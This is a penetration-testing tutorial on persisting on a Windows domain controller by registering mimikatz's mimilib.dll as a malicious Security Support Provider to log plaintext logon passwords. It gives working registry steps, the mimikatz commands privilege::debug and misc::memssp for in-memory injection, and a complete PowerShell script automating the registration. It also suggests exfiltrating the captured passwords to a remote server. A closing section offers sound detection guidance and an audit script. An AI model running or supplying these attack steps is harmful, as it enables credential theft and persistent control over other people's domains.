Domain Penetration: Security Support Provider


0x00 Preface

In the previous article I covered some penetration methods and techniques in a domain environment. This time I will introduce a method for keeping control of a domain controller after compromise: a malicious SSP.

0x01 Introduction

SSP:

Security Support Provider, also called a security package.

An SSP is a DLL that implements an authentication protocol. Windows ships with several, for example:

    NTLM
    Kerberos
    Negotiate
    Secure Channel (Schannel)
    Digest
    CredSSP (Credential Security Support Provider)

SSPI:

Security Support Provider Interface, the API that Windows applications use to perform authentication operations.

In other words, SSPI is the interface through which an application talks to an SSP; the application never calls the package DLL directly.

LSA:

Local Security Authority, the subsystem responsible for authentication. It runs as the process lsass.exe.

What makes this interesting is that LSA is extensible: when the system starts, every SSP listed in the registry is loaded into lsass.exe.

That means we can write our own DLL, register it as an SSP, and have it loaded into lsass.exe at the next boot.

The figure (not reproduced here) shows the normal SSPI structure: a client application calls Secur32.dll, which passes the request through SSPI to the security packages loaded inside LSA. Our custom DLL is simply one more package in that list, and the credential-handling callbacks LSA invokes on it give it access to what LSA sees.

The attack idea: since the DLL is ours, we implement its callbacks so that every logon processed by lsass.exe hands us the plaintext password, which we can then pass out of the process (for example through a named pipe or shared memory). When a user changes their password, the new password is captured immediately.

0x02 mimilib SSP

Mimikatz already implements this. It is mimilib.dll, the file that is often ignored when using mimikatz.

Next we test how to use mimilib as a forged SSP that records plaintext passwords.

Mimikatz PoC source (kssp.c):
Https://github.com/gentilkiwi/mimikatz/blob/bb371c2acba397b4006a6cddc0f9ce2b5958017b/mimilib/kssp.c

0x03 Actual test

Test environment

    Domain controller: Windows Server 2008 R2 x64
    Domain host:       Windows 7 x64

Test procedure:

1. Add the SSP

Copy mimilib.dll to C:\Windows\System32 on the domain controller.

Note:

On a 64-bit system use the 64-bit mimilib.dll; the 32-bit build will fail to load.

2. Register the SSP

Modify the registry. The list of packages is the REG_MULTI_SZ value Security Packages under the key:

    HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Lsa

Add mimilib.dll to the Security Packages value and click OK. Security Packages now includes mimilib.dll.

3. Restart the system

After the domain controller restarts, a new file kiwissp.log appears in C:\Windows\System32.

kiwissp.log records each logon account and its password.
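The same three steps scripted in PowerShell, as an added example that is not from the original article or from mimikatz. It assumes the 64-bit mimilib.dll is at C:\tools\mimilib.dll (an assumed path) and that it is run from an elevated 64-bit PowerShell on the domain controller. The bitness check reads the PE optional-header magic so the "32-bit DLL fails" note above is caught before the reboot rather than after it.

```powershell
# Added example: register a third-party SSP with PowerShell instead of regedit.
# Assumptions: $Source is the 64-bit mimilib.dll; the shell is elevated and 64-bit.
$Source  = 'C:\tools\mimilib.dll'                      # assumed path
$Target  = Join-Path $env:windir 'System32\mimilib.dll'
$LsaKey  = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa'
$Package = 'mimilib.dll'                               # value added in the article

# 1. The DLL must match the OS bitness: a 32-bit DLL will not load into a 64-bit lsass.
#    PE layout: e_lfanew at 0x3C -> "PE\0\0" (4 bytes) + COFF header (20 bytes),
#    then the optional header, whose first WORD is 0x20B for PE32+ (64-bit) or 0x10B for PE32.
function Test-Is64BitPE {
    param([string]$Path)
    $bytes    = [System.IO.File]::ReadAllBytes($Path)
    $peOffset = [BitConverter]::ToInt32($bytes, 0x3C)
    $magic    = [BitConverter]::ToUInt16($bytes, $peOffset + 24)
    return ($magic -eq 0x20B)
}
# [IntPtr]::Size is 8 in a 64-bit PowerShell host; this script assumes a 64-bit host.
if (([IntPtr]::Size -eq 8) -and -not (Test-Is64BitPE -Path $Source)) {
    throw "64-bit OS but $Source is not a 64-bit DLL; LSA will fail to load it."
}

# 2. Copy into System32, where LSA resolves package names.
Copy-Item -Path $Source -Destination $Target -Force

# 3. 'Security Packages' is REG_MULTI_SZ: append to the existing list, never overwrite it,
#    or the built-in packages (kerberos, msv1_0, ...) stop loading.
$current = (Get-ItemProperty -Path $LsaKey -Name 'Security Packages').'Security Packages'
if (@($current) -notcontains $Package) {
    $updated = @($current | Where-Object { $_ -ne '' }) + $Package
    Set-ItemProperty -Path $LsaKey -Name 'Security Packages' -Value $updated -Type MultiString
}

# 4. Show the resulting list; lsass.exe only picks up the new package after a reboot.
(Get-ItemProperty -Path $LsaKey -Name 'Security Packages').'Security Packages'
# Restart-Computer -Force   # uncomment to reboot; kiwissp.log appears in System32 afterwards
```

Appending rather than replacing the multi-string matters: a single wrong `reg add /d` that drops the existing entries leaves the domain controller unable to authenticate anyone, which is far more visible than the log file.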

Tips:

mimilib only saves the passwords locally. It would be more powerful if the SSP sent them to a remote server instead.

0x04 Supplement

1. Updating the SSP in memory

Mimikatz also supports loading the SSP directly into lsass memory, so no restart is needed to start collecting account information.

Run mimikatz.exe with the following commands:

    privilege::debug
    misc::memssp

Note:

1. A 64-bit system requires 64-bit mimikatz:

32-bit mimikatz: error

64-bit mimikatz: success

2. The in-memory patch does not survive a restart.

0x05 Detection

1. Registry

Check the Security Packages value under:

    HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Lsa

LSA also reads a Security Packages value under Lsa\OSConfig, so check that one as well.

2. DLL

Check %windir%\System32 for suspicious DLLs, and for the log file kiwissp.log that mimilib writes there.

3. Autoruns

Use Autoruns (the LSA Providers tab) to detect the added security package and find where the DLL was registered.

Note that the in-memory method (misc::memssp) adds no registry entry and no new DLL, so the checks above do not see it; it has to be found in lsass memory or through the artifacts it leaves on disk.
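An added PowerShell audit that is not part of the original article: it reads both Security Packages values, flags any package name outside an assumed baseline, checks the Authenticode signature of the corresponding DLL in System32, and looks for the log files. The baseline list is an assumption for this example; derive yours from a known-clean host of the same OS build. The file name mimilsa.log is the log written by misc::memssp according to mimikatz's own documentation, not something the article states.

```powershell
# Added example: audit registered SSPs on a host. Assumption: $Baseline reflects a
# known-clean build; anything else is reported with its DLL signature status.
$Baseline = @('kerberos', 'msv1_0', 'schannel', 'wdigest', 'tspkg', 'pku2u')

# LSA reads 'Security Packages' from both of these keys.
$Keys = @(
    'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa',
    'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig'
)

function Get-SuspiciousSecurityPackages {
    foreach ($key in $Keys) {
        $pkgs = (Get-ItemProperty -Path $key -Name 'Security Packages' -ErrorAction SilentlyContinue).'Security Packages'
        foreach ($p in @($pkgs)) {
            # On newer builds the Lsa value is a single empty string; skip those entries.
            if ([string]::IsNullOrEmpty($p) -or $p.Trim() -eq '') { continue }
            # Entries may be written with or without ".dll"; normalise before comparing.
            $name = [System.IO.Path]::GetFileNameWithoutExtension($p).ToLower()
            if ($Baseline -notcontains $name) {
                $dll = Join-Path $env:windir "System32\$name.dll"
                $sig = if (Test-Path $dll) { (Get-AuthenticodeSignature -FilePath $dll).Status } else { 'FileMissing' }
                New-Object PSObject -Property @{
                    Key       = $key
                    Package   = $p
                    Dll       = $dll
                    Signature = $sig   # 'Valid' from Microsoft is expected; 'NotSigned' is a red flag
                }
            }
        }
    }
}

# Log files: kiwissp.log is written by mimilib (registry method, shown in the article);
# mimilsa.log is the file name mimikatz documents for misc::memssp (in-memory method).
function Get-SspLogArtifacts {
    Get-ChildItem -Path (Join-Path $env:windir 'System32\*') -Include 'kiwissp.log', 'mimilsa.log' -ErrorAction SilentlyContinue
}

Get-SuspiciousSecurityPackages | Format-Table Key, Package, Signature, Dll -AutoSize
Get-SspLogArtifacts | Select-Object FullName, Length, LastWriteTime
```

Run it under a scheduled task or your EDR's script collection on every domain controller; an unsigned package name, or either log file, is worth an immediate look regardless of what the baseline says, because an attacker can also rename the DLL.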

0x06 Summary

This article only demonstrates the basic use of an SSP to save domain controller account passwords locally. More advanced techniques can be built on the same idea.

From the defensive side, conventional methods are insufficient; only by understanding the attack better can we defend against it better. On Windows 8.1 / Server 2012 R2 and later, enabling LSA Protection (RunAsPPL) prevents unsigned SSPs from being loaded into lsass.exe and stops ordinary administrator processes from opening lsass.exe for memory patching, which blocks both methods described here as written.
